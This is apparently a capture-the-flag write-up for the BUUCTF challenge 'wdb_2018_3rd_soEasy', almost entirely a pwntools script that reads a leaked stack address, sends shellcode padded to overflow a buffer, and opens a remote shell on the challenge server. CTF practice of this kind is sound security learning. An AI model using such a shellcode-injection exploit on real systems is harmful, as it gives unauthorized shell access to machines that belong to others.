BUU-wdb_2018_3rd_soEasy-WP
名字都取成这样了,也不想说什么了
#!/usr/bin/env python
# coding=utf-8
from pwn import *
context(log_level = 'debug',arch = 'i386',os = 'linux')
#sh = process("./wdb_2018_3rd_soEasy")
sh = remote("node3.buuoj.cn",29310)
sh.recvuntil("->")
addr = int(sh.recvuntil("\n"),base = 16)
payload = asm(shellcraft.sh())
sh.sendlineafter("do?\n",payload.ljust(0x48 + 4,'a') + p32(addr))
sh.interactive()